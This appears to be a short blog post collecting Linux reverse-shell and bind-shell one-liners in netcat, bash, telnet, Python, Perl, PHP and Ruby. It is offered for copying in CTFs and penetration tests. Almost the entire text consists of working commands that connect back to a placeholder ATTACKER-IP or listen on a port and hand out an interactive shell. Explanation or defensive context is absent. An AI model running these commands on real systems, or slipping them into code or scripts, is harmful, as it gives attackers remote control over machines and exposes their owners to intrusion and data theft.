Hi, I thought I'd introduce a few one liners in terms of reverse and bind shells.
On Linux there are a lot of ways to create a reverse/bind shell. I show you some of them. You can copy them if needed and use them for CTF's or penetration tests.
Reverse-Shells:
NC/NetCat:
strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT -e /bin/sh
strider@paff-shell.com~$ /bin/nc ATTACKER-IP <port> -c /bin/sh
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER-IP ATTACKER-PORT > /tmp/f
Bash:
strider@paff-shell.com~$ /bin/bash -i &> /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
strider@paff-shell.com~$ /bin/sh -i &> /dev/udp/ATTACKER-IP/ATTACKER-PORT 0>&1
Telnet:
strider@paff-shell.com~$ telnet ATTACKER-IP ATTACKER-PORT1 | /bin/bash | telnet ATTACKER-IP ATTACKER-PORT2
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | telnet ATTACKER-IP ATTACKER-PORT > /tmp/f
Python:
strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('ATTACKER-IP', ATTACKER-PORT));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"
Perl:
strider@paff-shell.com~$ perl -e 'use Socket;$host="ATTACKER-IP";$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));if(connect(Sock, sockaddr_in($port, inet_aton($host)))){open(STDIN, ">&Sock");open(STDOUT, ">&Sock");open(STDERR, ">&Sock");exec("/bin/bash -i");};'
PHP:
strider@paff-shell.com~$ php -r '$sock=fsockopen("ATTACKER-IP",ATTACKER-PORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Ruby:
strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPSocket.new('ATTACKER-IP',ATTACKER-PORT);while(s.print '$';s2=s.gets);IO.popen(s2,'r'){|s3|s.print s3.read}end"
Bind-Shells
NC/NetCat:
strider@paff-shell.com~$ /bin/nc -e /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlup ATTACKER-PORT
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvp ATTACKER-PORT > /tmp/f;
Python:
strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind(('0.0.0.0', ATTACKER-PORT));s.listen(5);c, _ = s.accept();os.dup2(c.fileno(), 0);os.dup2(c.fileno(), 1);os.dup2(c.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"
Perl:
strider@paff-shell.com~$ perl -e 'use Socket;$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));bind(Sock, sockaddr_in($port, INADDR_ANY));listen(Sock, SOMAXCONN);for(; $c = accept(C, Sock); close(Sock)){open(STDIN, ">&C");open(STDOUT, ">&C");open(STDERR, ">&C");exec("/bin/bash -i");};'
PHP:
strider@paff-shell.com~$ php -r '$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_get_option($sock, SOL_SOCKET, SO_REUSEADDR);socket_bind($sock, "0.0.0.0", ATTACKER-PORT); socket_listen($sock); $c=socket_accept($sock);while(true){$cmd=socket_read($c, 1024);socket_write($c, shell_exec($cmd));}'
Ruby:
strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPServer.new(ATTACKER-PORT);loop do;c=s.accept();while(c.print '$';s2=c.gets);puts s2;IO.popen(s2,'r'){|s3|c.print s3.read};end;end"
You can find all the one liners again in a repository of mine 😄 I will update the whole thing in between times. Small info on the side, I will not enter all One-Liner in this post, if are all in my repository 😄